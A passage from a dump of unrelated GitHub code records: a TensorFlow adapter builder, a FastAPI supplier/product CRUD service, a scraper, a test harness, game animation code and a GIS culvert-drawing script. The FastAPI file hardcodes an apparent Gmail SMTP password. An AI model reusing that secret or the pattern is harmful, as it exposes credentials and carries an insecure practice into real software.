src.ai.neural_network.technology_adapter.network_technology_adapter_builder import NetworkTechnologyAdapterBuilder\nfrom src.ai.neural_network.technology_adapter.optimizer import Optimizer\nfrom src.ai.neural_network.technology_adapter.tensorflow.builder.command_cost_definer_layer_builder import \\\n TensorflowCommandCostDefinerLayerBuilder\nfrom src.ai.neural_network.technology_adapter.tensorflow.builder.input_param_cost_definer_layer_builder import \\\n TensorflowInputParamCostDefinerLayerBuilder\nfrom src.ai.neural_network.technology_adapter.tensorflow.scout_network_adapter import ScoutNetworkAdapter\nfrom src.ai.neural_network.technology_adapter.tensorflow.tensorflow_network_adapter_builder import \\\n TensorflowNetworkAdapterBuilder\n\n\nclass InputLayerNames(Enum):\n unit_observation: str = \"unit_observation\"\n person_unit_params: str = \"person_unit_params\"\n sector_params: str = \"sector_params\"\n\n\nclass InputParamCostDefinerLayerNames(Enum):\n unit_observation: str = \"unit_observation__cost_definer\"\n person_unit_params: str = \"person_unit_params__cost_definer\"\n sector_params: str = \"sector_params__cost_definer\"\n\n\nclass CommandCostDefinerLayerNames(Enum):\n unit_observation: str = \"unit_observation__command_cost_definer\"\n person_unit_params: str = \"person_unit_params__command_cost_definer\"\n sector_params: str = \"sector_params__command_cost_definer\"\n\n\ncommand_cost_definer_layer_names: List[CommandCostDefinerLayerNames] = []\nfor name in CommandCostDefinerLayerNames:\n command_cost_definer_layer_names.append(name)\n\n\nclass CommandCostDefinerTensorNames(Enum):\n up: str = \"up_command_cost_definer\"\n up_right: str = \"up_right_command_cost_definer\"\n right: str = \"right_command_cost_definer\"\n down_right: str = \"down_right_command_cost_definer\"\n down: str = \"down_command_cost_definer\"\n down_left: str = \"down_left_command_cost_definer\"\n left: str = \"left_command_cost_definer\"\n up_left: str = \"up_left_command_cost_definer\"\n\n\nclass LengthDistanceTensorPrefix(Enum):\n min: str = \"min_distance\"\n max: str = \"max_distance\"\n\n\ncommand_cost_definer_tensor_names: List[str] = []\nfor prefix in LengthDistanceTensorPrefix:\n for name in CommandCostDefinerTensorNames:\n command_cost_definer_tensor_names.append(prefix.value + \"__\" + name.value)\n\n\nclass CommandCostDefinerTensorId(Enum):\n up: int = 0\n up_right: int = 1\n right: int = 2\n down_right: int = 3\n down: int = 4\n down_left: int = 5\n left: int = 6\n up_left: int = 7\n\n\nclass CommandDefinerLevel(Enum):\n command_cost_summation_layer: str = \"command_cost_summation_layer\"\n result: str = \"result_layer\"\n\n\nclass NetworkTechnologyAdapterDirector:\n def __init__(self):\n self._builder: NetworkTechnologyAdapterBuilder = TensorflowNetworkAdapterBuilder()\n self._input_param_cost_definer_builder: InputParamCostDefinerLayerBuilder \\\n = TensorflowInputParamCostDefinerLayerBuilder()\n self._command_cost_definer_builder: CommandCostDefinerLayerBuilder \\\n = TensorflowCommandCostDefinerLayerBuilder()\n\n def generate_scout_network_adapter(self,\n ai_info: AiInfo,\n ai_awards_definer: AiAwardsDefiner) -> NetworkAdapter:\n if ai_info.ai_type != \"neuron-network\":\n return NetworkAdapter()\n result: ScoutNetworkAdapter = self._builder.generate_scout_network_adapter(ai_info)\n\n # if result.exist_model():\n # error_function: ErrorFunction = self._builder.generate_error_function(ai_awards_definer)\n # optimizer: Optimizer = self._builder.generate_optimizer()\n # return self._builder.compile_model(result, error_function, optimizer)\n input_layers: Dict[str, NetworkLayers] = self._build_input_layers()\n result.set_input_layers(input_layers)\n\n input_param_cost_definer: NetworkLayers = self._build_input_param_cost_definer_layers(input_layers)\n result.set_input_param_cost_definer(input_param_cost_definer)\n\n command_cost_definer_layer: Dict[str, NetworkLayers] = self._build_command_cost_definer_layers(\n input_param_cost_definer)\n result.set_command_cost_definer(command_cost_definer_layer)\n\n command_definer_layer: NetworkLayer = self._build_command_definer_layers(command_cost_definer_layer)\n result.set_command_definer(command_definer_layer)\n\n output_layer: NetworkLayers = self._build_output_layer(command_definer_layer)\n result.set_output_layer(output_layer)\n\n error_function: ErrorFunction = self._builder.generate_error_function(ai_awards_definer)\n optimizer: Optimizer = self._builder.generate_optimizer()\n return self._builder.compile_model(result, error_function, optimizer)\n\n def _build_input_layers(self) -> Dict[str, NetworkLayers]:\n result: Dict[str, NetworkLayers] = {\n InputLayerNames.unit_observation.value: self._builder.generate_input_unit_observation_layer(),\n InputLayerNames.sector_params.value: self._builder.generate_input_sector_params_layer(),\n InputLayerNames.person_unit_params.value: self._builder.generate_input_person_unit_params_layer(),\n }\n return result\n\n def _build_input_param_cost_definer_layers(self, input_layers: Dict[str, NetworkLayers]) -> NetworkLayers:\n builder: InputParamCostDefinerLayerBuilder = self._input_param_cost_definer_builder\n result: NetworkLayers = {\n InputParamCostDefinerLayerNames.unit_observation.value:\n builder.generate_unit_observation_layer(\n input_layers\n ),\n InputParamCostDefinerLayerNames.sector_params.value:\n builder.generate_sector_params_layer(\n input_layers\n ),\n InputParamCostDefinerLayerNames.person_unit_params.value:\n builder.generate_person_unit_params_layer(\n input_layers\n ),\n }\n return result\n\n def _build_command_cost_definer_layers(self, input_layers: NetworkLayers) -> Dict[str, NetworkLayers]:\n builder: CommandCostDefinerLayerBuilder = self._command_cost_definer_builder\n result: Dict[str, NetworkLayers] = {\n CommandCostDefinerLayerNames.unit_observation.value:\n builder.generate_for_unit_observation_layer(\n input_layers\n ),\n CommandCostDefinerLayerNames.sector_params.value:\n builder.generate_for_sector_params_layer(\n input_layers\n ),\n CommandCostDefinerLayerNames.person_unit_params.value:\n builder.generate_for_person_unit_params_layer(\n input_layers\n ),\n }\n return result\n\n def _build_command_definer_layers(self, input_layers: Dict[str, NetworkLayers]) -> NetworkLayer:\n result: NetworkLayer = self._builder.generate_command_definer_layer(input_layers)\n return result\n\n def _build_output_layer(self, input_layer: NetworkLayer) -> NetworkLayers:\n result: NetworkLayers = self._builder.generate_output_layer(input_layer)\n return result\n","repo_name":"7kia/AIServer","sub_path":"src/ai/neural_network/technology_adapter/network_technology_adapter_director.py","file_name":"network_technology_adapter_director.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29490122119","text":"from fastapi import BackgroundTasks, FastAPI, UploadFile, File, Form\nfrom tortoise.contrib.fastapi import register_tortoise\nfrom models import (\n supplier_pydantic,\n supplier_pydanticIn,\n Supplier,\n product_pydantic,\n product_pydanticIn,\n Product,\n)\n\n# email\nfrom typing import List\nfrom fastapi_mail import ConnectionConfig, FastMail, MessageSchema, MessageType\nfrom pydantic import BaseModel, EmailStr\nfrom starlette.responses import JSONResponse\n\n# dotenv\nfrom dotenv import dotenv_values\n\n# credentials\ncrendentials = dotenv_values(\".env\")\n\n#addings cors headers\nfrom fastapi.middleware.cors import CORSMiddleware\n\n\n\napp = FastAPI()\n\n#adding cors urls\norigins = [\n 'http://localhost:3000'\n]\n\n#add middleware\napp.add_middleware(\n CORSMiddleware,\n allow_origins = origins,\n allow_credentials = True,\n allow_methods = [\"*\"],\n allow_headers = [\"*\"]\n)\n\n@app.get(\"/\")\ndef index():\n return {\"Msg \": \"Go to '/docs' for the API documentation\"}\n\n\n# CRUD functionalities for Supplier Model\n@app.post(\"/supplier\")\nasync def add_supplier(supplier_info: supplier_pydanticIn):\n supplier_obj = await Supplier.create(**supplier_info.dict(exclude_unset=True))\n response = await supplier_pydantic.from_tortoise_orm(supplier_obj)\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.get(\"/supplier\")\nasync def get_all_suppliers():\n response = await supplier_pydantic.from_queryset(Supplier.all())\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.get(\"/supplier/{supplier_id}\")\nasync def get_specific_supplier(supplier_id: int):\n response = await supplier_pydantic.from_queryset_single(\n Supplier.get(id=supplier_id)\n )\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.put(\"/supplier/{supplier_id}\")\nasync def update_supplier(supplier_id: int, update_info: supplier_pydanticIn):\n supplier = await Supplier.get(id=supplier_id)\n update_info = update_info.dict(exclude_unset=True)\n supplier.name = update_info[\"name\"]\n supplier.company = update_info[\"company\"]\n supplier.email = update_info[\"email\"]\n supplier.phone = update_info[\"phone\"]\n await supplier.save()\n response = await supplier_pydantic.from_tortoise_orm(supplier)\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.delete(\"/supplier/{supplier_id}\")\nasync def delete_supplier(supplier_id: int):\n supplier = await Supplier.filter(id=supplier_id).first()\n if supplier:\n await supplier.delete()\n return {\"status\": \"ok\"}\n else:\n return {\"status\": \"Supplier not found\"}\n\n\n# CRUD functionalities for Product Model\n\n\n@app.post(\"/product/{supplier_id}\")\nasync def add_product(supplier_id: int, products_details: product_pydanticIn):\n supplier = await Supplier.get(id=supplier_id)\n products_details = products_details.dict(exclude_unset=True)\n products_details[\"revenue\"] += (\n products_details[\"quantity_sold\"] * products_details[\"unit_price\"]\n )\n product_obj = await Product.create(**products_details, supplied_by=supplier)\n response = await product_pydantic.from_tortoise_orm(product_obj)\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.get(\"/product\")\nasync def get_all_products():\n response = await product_pydantic.from_queryset(Product.all())\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.get(\"/product/{product_id}\")\nasync def get_specific_product(product_id: int):\n response = await product_pydantic.from_queryset_single(Product.get(id=product_id))\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.put(\"/product/{product_id}\")\nasync def update_product(product_id: int, update_info: product_pydanticIn):\n product = await Product.get(id=product_id)\n update_info = update_info.dict(exclude_unset=True)\n product.name = update_info[\"name\"]\n product.quantity_in_stock = update_info[\"quantity_in_stock\"]\n product.quantity_sold = update_info[\"quantity_sold\"]\n product.unit_price = update_info[\"unit_price\"]\n product.revenue = (\n update_info[\"quantity_sold\"] * update_info[\"unit_price\"]\n ) + update_info[\"revenue\"]\n await product.save()\n response = await product_pydantic.from_tortoise_orm(product)\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.delete(\"/product/{product_id}\")\nasync def delete_product(product_id: int):\n product = await Product.filter(id=product_id).first()\n if product:\n await product.delete()\n return {\"status\": \"ok\"}\n else:\n return {\"status\": \"Product not found\"}\n\n\nclass EmailSchema(BaseModel):\n email: List[EmailStr]\n\n\nclass EmailContent(BaseModel):\n message: str\n subject: str\n\n\nconf = ConnectionConfig(\n MAIL_USERNAME=crendentials[\"EMAIL\"],\n MAIL_PASSWORD=\"jewfdebdknhajkgn\",\n MAIL_FROM=crendentials[\"EMAIL\"],\n MAIL_PORT=587,\n MAIL_SERVER=\"smtp.gmail.com\",\n MAIL_STARTTLS=True,\n MAIL_SSL_TLS=False,\n USE_CREDENTIALS=True,\n VALIDATE_CERTS=True,\n)\n\n\n@app.post(\"/email/{product_id}\")\nasync def send_email(product_id: int, content: EmailContent):\n product = await Product.get(id=product_id)\n supplier = await product.supplied_by\n suplier_email = [supplier.email]\n\n html = f\"\"\"\n
    Arthya Tech Solutions Private Ltd.
    \n
    \n

    {content.message}

    \n
    \n
    Best Regards
    \n
    Arthya Tech Solutions Private Ltd.
    \n \"\"\"\n\n message = MessageSchema(\n subject=content.subject, recipients=suplier_email, body=html, subtype=\"html\"\n )\n\n fm = FastMail(conf)\n await fm.send_message(message)\n return {\"status\": \"ok\"}\n\n\nregister_tortoise(\n app,\n db_url=\"sqlite://database.sqlite3\",\n modules={\"models\": [\"models\"]},\n generate_schemas=True,\n add_exception_handlers=True,\n)\n","repo_name":"amrutha-au/fastapi","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40868588083","text":"'''\nClase que se comporta como estructura para guardar un átomo, y los\ndiferentes atributos que tiene\n'''\nclass Atom:\n def __init__(self, name, electroNeg, doubleDots, singleDots):\n self.name = name\n self.quantity = 1\n self.electroNeg = electroNeg\n\n self.arrayAtoms = []\n self.Bonds = []\n\n self.doubleDots = doubleDots\n self.singleDots = singleDots\n\n #for drawing\n self.freeSpaces = 4","repo_name":"Jasc01/Lewis-Structure_Oxacids-and-Hidracids","sub_path":"Main Project/atom.py","file_name":"atom.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74760742313","text":"from urllib.parse import urljoin\n\n\ndef extract_kkr(soup, main_url):\n urls = []\n div_tag = soup.find('div', {'class': \"__blog-post-lists\"})\n ul_tag = div_tag.find('ul', {'class': None})\n li_tags = ul_tag.findAll('li')\n i = 0\n for li in li_tags:\n i += 1\n url = li.contents[3].get('href')\n urls.append(urljoin(main_url, url))\n\n return urls\n","repo_name":"ikhachatryan93/media_scrp","sub_path":"kkr_extractor.py","file_name":"kkr_extractor.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11466062257","text":"#!/usr/bin/env python\n\nimport shutil\nimport json\nimport subprocess\nimport os\nimport time\n\nimport atomsci.ddm.pipeline.parameter_parser as parse\nimport atomsci.ddm.pipeline.compare_models as cm\nimport glob\nfrom atomsci.ddm.utils import llnl_utils\n\ndef clean():\n \"\"\"\n Clean test files\n \"\"\"\n if \"hyperparam_search\" in os.listdir():\n shutil.rmtree(\"hyperparam_search\")\n\n if \"logs\" in os.listdir():\n shutil.rmtree(\"logs\")\n\n if \"run.sh\" in os.listdir():\n os.remove(\"run.sh\")\n\n if \"slurm_files\" in os.listdir():\n shutil.rmtree(\"slurm_files\")\n\n maestro_folders = glob.glob('Test_Maestro_*')\n for mf in maestro_folders:\n shutil.rmtree(mf)\n\ndef run_command(command):\n \"\"\"Runs the command and returns string\n\n Args:\n command (list): list of strings e.g. ['wc', '-l']\n\n Returns:\n str: output of the command\n \"\"\"\n p = subprocess.Popen(command, stdout=subprocess.PIPE)\n out = p.stdout.read().decode(\"utf-8\")\n\n return out\n\ndef wait_to_finish(maestro_run_command, max_time=600):\n \"\"\" Run hyperparam search and return pref_df\n\n Given parased parameter namespace build the hyperparam search command and\n wait for training to complete. Once training is complete, retrun the perf_df.\n This function repeatedly calls get_filesystem_perf_results until it sees\n at least the number of jobs generated by pparams.\n\n Args:\n maestro_run_command (str): Command to start maestro run.\n\n max_type (int): Max wait time in seconds. Default 600. -1 is unlimited\n wait time.\n\n Returns:\n bool: Returns True on completetion. \n\n \"\"\"\n out = run_command(maestro_run_command.split(' '))\n\n maestro_folders = glob.glob('Test_Maestro*')\n # We assert here that there should only be one maestro folder.\n # something is wrong with the test otherwise\n assert len(maestro_folders) == 1\n maestro_folder = maestro_folders[0]\n\n print('folder created')\n\n # make sure that there's a status file\n status_file = os.path.join(maestro_folder, 'status.csv')\n \n # wait for the file to be available\n while not os.path.exists(status_file):\n time.sleep(2)\n\n assert os.path.exists(status_file)\n\n print('status found')\n\n # check how many jobs got started\n out = run_command(['wc', '-l', status_file])\n num_jobs = int(out.split(' ')[0]) # out expected to look like \"2 Test_Maestro...\"\n\n num_completed = 0\n time_waited = 0\n wait_interval = 30\n print(\"Waiting %d jobs to finish. Checks every 30 seconds\" % num_jobs)\n while (num_completed < num_jobs) and ((max_time == -1) or (time_waited < max_time)):\n # wait until the training jobs have finished\n time.sleep(wait_interval) # check for results every 30 seconds\n time_waited += wait_interval\n finished_grep = run_command(['grep', '-c', 'FINISHED', status_file])\n try:\n num_completed = int(finished_grep)\n except ValueError:\n num_completed = 0\n\n failed_grep = run_command(['grep', '-c', 'FAILED', status_file])\n try:\n num_failed = int(failed_grep)\n except ValueError:\n num_failed = 0\n\n print(f'{num_completed} jobs finished {num_failed} jobs failed')\n assert num_failed == 0\n\n # see if you timed out\n assert time_waited < max_time\n\n return True\n\ndef test():\n \"\"\"\n Test full model pipeline: Curate data, fit model, and predict property for new compounds\n \"\"\"\n\n # Clean\n # -----\n clean()\n\n if not llnl_utils.is_lc_system():\n assert True\n return\n \n # Run ECFP NN hyperparam search\n # ------------\n json_file = \"nn_ecfp.json\"\n with open(json_file, \"r\") as f:\n hp_params = json.load(f)\n pparams = parse.wrapper(hp_params)\n\n print('launch maestro')\n _ = wait_to_finish(f\"maestro run -y -p custom_gen.py run_nn_ecfp.yaml\", max_time=2*60*60) # wait 2 hours.\n\n result_df = cm.get_filesystem_perf_results(pparams.result_dir, pparams.prediction_type)\n assert not result_df is None # Timed out\n assert max(result_df.loc[:,result_df.columns.str.contains(\"test_r2_score\")].values) > 0.6 # should do at least this well. I saw values like 0.687\n \n print('waiting for maestro to finish')\n time.sleep(60)\n\n # Clean\n # -----\n clean()\n\nif __name__ == '__main__':\n test()\n","repo_name":"ATOMScience-org/AMPL","sub_path":"atomsci/ddm/test/integrative/maestro/test_maestro.py","file_name":"test_maestro.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"72"} +{"seq_id":"43908917548","text":"def main(s: str):\n longest = \"\"\n tempLongest = \"\"\n stringIndex = 0\n\n while len(s) > 2 * len(longest):\n if (stringIndex >= len(s)):\n longest = tempLongest\n break\n\n if stringInculdes(tempLongest, s[stringIndex]):\n if len(tempLongest) > len(longest):\n longest = tempLongest\n tempLongest = \"\"\n stringIndex = 0\n s = s[1:]\n else:\n tempLongest += s[stringIndex]\n stringIndex += 1\n return len(longest)\n\n\ndef stringInculdes(string: str, char: str):\n for i in string:\n if char == i:\n return True\n return False\n","repo_name":"Cherifi-Houdaifa/ma-leetcode","sub_path":"leetcode_3.py","file_name":"leetcode_3.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30841508172","text":"from .BasicComponents import *\nfrom .locals import *\n\nfrom os.path import join as j_path\n\nclass StateComponent(StatesComponent, VelocityComponent):\n\n\tdef __init__(self):\n\t\tsuper(StateComponent, self).__init__()\n\t\tself.state = ShStates.MOVE\n\n\t\t# Create sensor-rects. Their values aren't definitive - they're updated in the update-method.\n\t\t# Sensor-rects are rects that \"sense\" if there is an edge, and if there is, they turn.\n\t\tself.sensor_rect_r = pygame.Rect(1, 1, 10, 10)\n\t\tself.sensor_rect_l = pygame.Rect(1, 1, 10, 10)\n\n\t\tself.colliding_mats = [\"solid\", \"soft-break\", \"hard-break\", \"shot-break\", \"fire-break\"]\n\t\tself.state_stack = [None for i in range(5)]\n\n\tdef update(self, game_actor, engine):\n\t\t# Update sensor-rects\n\t\tself.sensor_rect_r.topleft = game_actor.rect.bottomright\n\t\tself.sensor_rect_l.topright = game_actor.rect.bottomleft\n\n\t\tif self.state == ShStates.MOVE:\n\t\t\tif self.look_direction == LEFT:\n\t\t\t\tif engine.world.get_colliding_rect(Layers.main, self.colliding_mats, self.sensor_rect_l) is None:\n\t\t\t\t\tself.state = ShStates.TURN\n\t\t\telif self.look_direction == RIGHT:\n\t\t\t\tif engine.world.get_colliding_rect(Layers.main, self.colliding_mats, self.sensor_rect_r) is None:\n\t\t\t\t\tself.state = ShStates.TURN\n\n\t\t\tif RIGHT in self.colliding_sides or LEFT in self.colliding_sides:\n\t\t\t\tself.state = ShStates.TURN\n\t\t\telif not BOTTOM in self.colliding_sides:\n\t\t\t\tself.state = ShStates.STAY\n\n\t\telif self.state == ShStates.STAY:\n\t\t\tif BOTTOM in self.colliding_sides:\n\t\t\t\tself.state = ShStates.MOVE\n\n\t\tself.state_stack.pop(0)\n\t\tself.state_stack.append(self.state)\n\n\t\tgame_actor.send_message(MSGN.STATE, self.state)\n\t\tgame_actor.send_message(MSGN.STATESTACK, self.state_stack)\n\t\tgame_actor.send_message(MSGN.LOOKDIRECTION, self.look_direction)\n\n\nclass LookComponent(StatesComponent):\n\tdef __init__(self):\n\t\tsuper(LookComponent, self).__init__()\n\n\t\t# Initialize all Animation objects:\n\t\tself.animations = {}\n\t\twalk_r_imgs = split_tiled_image(pygame.image.load(j_path(\"images\", \"spearhead\", \"ANI_walk_r.png\")).convert_alpha(), (24, 16))\n\t\tself.animations[\"walk_right\"] = Animation(walk_r_imgs, [(2, 15), (0, 15), (1, 15), (0, 15)])\n\t\tself.animations[\"walk_left\"] = self.animations[\"walk_right\"].make_x_mirror()\n\n\t\tself.animations[\"stand_right\"] = Animation(walk_r_imgs, [0, 600])\n\t\tself.animations[\"stand_left\"] = self.animations[\"stand_right\"].make_x_mirror()\n\n\t\tturn_imgs = split_tiled_image(pygame.image.load(j_path(\"images\", \"spearhead\", \"ANI_turn_l.png\")).convert_alpha(), (24, 16))\n\t\tself.animations[\"turn_left\"] = Animation(turn_imgs, [(0,8), (1, 4), (0, 8), (1, 4), (0, 15), (1, 2), (0, 8), (2, 8), (3, 8), (4, 8), (5, 30), (5, 1)])\n\t\tself.animations[\"turn_right\"] = self.animations[\"turn_left\"].make_x_mirror()\n\n\t\t# Save the current animation\n\t\tself.current_animation = self.animations[\"stand_right\"]\n\t\t# Save the last animation to check if a new animation has started:\n\t\tself.current_animation_name = \"stand_right\"\n\t\t# Play the current animation\n\t\tself.current_animation.play()\n\n\tdef receive_message(self, name, value):\n\t\tsuper(LookComponent, self).receive_message(name, value)\n\n\tdef update(self, game_actor, engine):\n\t\tif self.state == ShStates.MOVE:\n\t\t\tif self.look_direction == RIGHT:\n\t\t\t\tself.play_animation(\"walk_right\")\n\t\t\telif self.look_direction == LEFT:\n\t\t\t\tself.play_animation(\"walk_left\")\n\t\telif self.state == ShStates.STAY:\n\t\t\tif self.look_direction == RIGHT:\n\t\t\t\tself.play_animation(\"stand_right\")\n\t\t\telif self.look_direction == LEFT:\n\t\t\t\tself.play_animation(\"stand_left\")\n\t\telif self.state == ShStates.TURN:\n\t\t\tif self.look_direction == LEFT:\n\t\t\t\tself.play_animation(\"turn_right\")\n\t\t\telif self.look_direction == RIGHT:\n\t\t\t\tself.play_animation(\"turn_left\")\n\n\t\t\tif self.current_animation.get_spritenr()+1 == self.current_animation.get_animation_length():\n\t\t\t\tself.state = ShStates.MOVE\n\t\t\t\t# Turn:\n\t\t\t\tif self.look_direction == LEFT:\n\t\t\t\t\tself.look_direction = RIGHT\n\t\t\t\t\tself.play_animation(\"walk_right\")\n\t\t\t\telse:\n\t\t\t\t\tself.look_direction = LEFT\n\t\t\t\t\tself.play_animation(\"walk_left\")\n\n\t\t# Update the current animation:\n\t\tself.current_animation.update()\n\n\t\t# Calculate the position of the image so its midbottom is aligned with the midbottom of the game_actor\n\t\tif self.look_direction == RIGHT:\n\t\t\tsurface_pos = self.current_animation.get_surface().get_rect(bottomleft = game_actor.rect.bottomleft)\n\t\telse:\n\t\t\tsurface_pos = self.current_animation.get_surface().get_rect(bottomright = game_actor.rect.bottomright)\n\n\t\t# Blit the current sprite to the screen:\n\t\tengine.graphics.blit(self.current_animation.get_surface(), surface_pos)\n\n\t\t# Update the other components:\n\t\tgame_actor.send_message(MSGN.STATE, self.state)\n\t\tgame_actor.send_message(MSGN.LOOKDIRECTION, self.look_direction)\n\n\tdef play_animation(self, animation_name):\n\t\t\"\"\"Plays an animation only if the wanted animation isn't\n\t\talready playing.\n\t\t\"\"\"\n\t\tif self.current_animation_name != animation_name:\n\t\t\tself.current_animation_name = animation_name\n\t\t\tself.current_animation = self.animations[self.current_animation_name]\n\t\t\tself.current_animation.reset()\n\t\t\tself.current_animation.update()\n\n\nclass MoveComponent(StatesComponent, VelocityComponent):\n\n\tdef __init__(self):\n\t\tsuper(MoveComponent, self).__init__()\n\t\tself.walk_speed = 0.5\n\t\tself.velocity = (0, 0)\n\n\tdef receive_message(self, name, value):\n\t\tsuper(MoveComponent, self).receive_message(name, value)\n\t\tif name == MSGN.VELOCITY:\n\t\t\tself.velocity = value\n\n\tdef update(self, game_actor, engine):\n\t\tif self.state == ShStates.MOVE:\n\t\t\tif self.look_direction == LEFT:\n\t\t\t\tself.velocity = -self.walk_speed, self.velocity[1]\n\t\t\telse:\n\t\t\t\tself.velocity = self.walk_speed, self.velocity[1]\n\n\t\telif self.state == ShStates.STAY or self.state == ShStates.TURN:\n\t\t\tself.velocity = 0, self.velocity[1]\n\n\t\tgame_actor.send_message(MSGN.VELOCITY, self.velocity)\n","repo_name":"Nearoo/Wario-Land-3","sub_path":"Components/SpearheadComponents.py","file_name":"SpearheadComponents.py","file_ext":"py","file_size_in_byte":5788,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"72"} +{"seq_id":"18923694604","text":"# (c) Nelen & Schuurmans. GPL licensed, see LICENSE.txt\n# -*- coding: utf-8 -*-\n\nfrom nens.gp import parse_arguments\nimport os\nimport sys\nimport logging\nimport nens.gp\nfrom dbfpy import dbf\nimport ConfigParser\nfrom jinja2 import Environment, PackageLoader\nfrom jinja2.utils import soft_unicode\nfrom datetime import datetime\nimport turtlebase.general\n\n\ndef do_isknown(value):\n return value or \"???\"\n\n\ndef do_pyformat(value, format):\n \"\"\"return float according to format\n \"\"\"\n\n try:\n if value == -9999:\n return \"???\"\n else:\n return soft_unicode(\"%\" + format) % value\n except TypeError:\n return \"???\"\n\n\ndef do_material(value):\n \"\"\"translate numeric material or return string\n \"\"\"\n\n try:\n return {'01': 'aluminium',\n '02': 'asbest-cement',\n '03': 'beton',\n '04': 'gegolfd plaatstaal',\n '17': 'metselwerk',\n '20': 'PVC',\n '21': 'staal',\n '99': 'overig',\n }[value]\n except (TypeError, KeyError):\n return value\n\n\ndef do_form(value):\n \"\"\"return float according to format\n \"\"\"\n\n try:\n return {'01': 'rond',\n '02': 'rechthoekig',\n '03': 'eivormig',\n '04': 'muil',\n '05': 'ellips',\n '06': 'heul',\n '99': 'onbekend',\n }[value]\n except (TypeError, KeyError):\n return value\n\ndef main(options=None, args=None):\n from turtlebase import mainutils\n \n log = logging.getLogger(__name__)\n gp = mainutils.create_geoprocessor()\n \n mainutils.log_header(__name__)\n\n if options is args is None:\n options, args = parse_arguments({1: ('arg', 0),\n 2: ('arg', 1),\n 3: ('arg', 2)})\n\n shape_file, output_dir, settings = args\n\n dbf_file_name = shape_file[:-3] + 'dbf'\n table = dbf.Dbf(dbf_file_name, readOnly=True)\n\n resources_dir = os.path.dirname(sys.argv[0])\n log.info(resources_dir)\n\n config = ConfigParser.ConfigParser()\n config.read(settings)\n\n env = Environment(loader=PackageLoader('__main__', resources_dir))\n env.filters['pyformat'] = do_pyformat\n env.filters['filter_material'] = do_material\n env.filters['filter_isknown'] = do_isknown\n template_svg = env.get_template('duiker.svg')\n\n output_graphs = os.path.join(output_dir, \"graph\")\n log.info(\"output graphs: %s\" % output_graphs)\n if not os.path.isdir(output_graphs):\n os.makedirs(output_graphs)\n\n for row in table:\n svg_info = {}\n for field in config.options('column.culvert'):\n if field == '-':\n continue\n db_field = config.get('column.culvert', field)\n if db_field == '-':\n svg_info[field] = \"\"\n continue\n try:\n svg_info[field] = row[db_field]\n except:\n ## column is configured but not in data, possibly\n ## using a configuration that is more than we need\n ## here.\n continue\n if svg_info[field] is None:\n svg_info[field] = \"\"\n if isinstance(svg_info['date'], datetime):\n svg_info['date'] = svg_info['date'].strftime('%Y-%m-%d')\n svg_info['has_diametre'] = (svg_info['profile_shape'] in ['rond'])\n\n svg_data = template_svg.render(svg_info)\n filename = os.path.join(output_graphs, svg_info['name'] + \".svg\")\n out = file(filename, \"w\")\n out.write(svg_data)\n out.close()\n\n location_svg = output_graphs + \"\\\\*.svg\"\n log.info('%s\\\\batik\\\\convert_svg_to_png.bat %s' % (os.path.dirname(sys.argv[0]), location_svg))\n os.system('%s\\\\batik\\\\convert_svg_to_png.bat %s' % (os.path.dirname(sys.argv[0]), location_svg))\n\n # Create CSV files\n output_csv = os.path.join(output_dir, \"csv\")\n log.info(\"output csv: %s\" % output_csv)\n if not os.path.isdir(output_csv):\n os.makedirs(output_csv)\n\n row = gp.SearchCursor(shape_file)\n log.info(\"Create CSV files\")\n for item in nens.gp.gp_iterator(row):\n #log.info(\" - export csv for: %s\" % item.GetValue('kwk_name'))\n\n output_file = os.path.join(output_csv, \"%s.csv\" % item.GetValue(config.get('column.culvert', 'name')))\n turtlebase.general.add_to_csv(output_file, [('Location: ', item.GetValue(config.get('column.culvert', 'name')))], \"wb\")\n turtlebase.general.add_to_csv(output_file, [('Vorm: ', item.GetValue(config.get('column.culvert', 'profile_shape')))], \"ab\")\n turtlebase.general.add_to_csv(output_file, [('Materiaal: ', item.GetValue(config.get('column.culvert', 'material')))], \"ab\")\n turtlebase.general.add_to_csv(output_file, [('Streefpeil: ', round(item.GetValue(config.get('column.culvert', 'target_level')), 2))], \"ab\")\n turtlebase.general.add_to_csv(output_file, [('Diameter: ', round(item.GetValue(config.get('column.culvert', 'diametre')), 2))], \"ab\")\n turtlebase.general.add_to_csv(output_file, [('Lengte: ', round(item.GetValue(config.get('column.culvert', 'length')), 2))], \"ab\")\n turtlebase.general.add_to_csv(output_file, [('BOB1: ', round(item.GetValue(config.get('column.culvert', 'bed_level_left')), 2))], \"ab\")\n turtlebase.general.add_to_csv(output_file, [('BOB2: ', round(item.GetValue(config.get('column.culvert', 'bed_level_right')), 2))], \"ab\")\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO, format='%(message)s',)\n\n from optparse import OptionParser\n usage = \"usage: %prog [options] shape_file output_dir config\"\n parser = OptionParser(usage=usage)\n (options, args) = parser.parse_args()\n main(options, args)\n\n","repo_name":"nens/turtle-rural","sub_path":"rural_culvertprofiles.py","file_name":"rural_culvertprofiles.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"9491793342","text":"import os\r\nimport numpy as np\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as 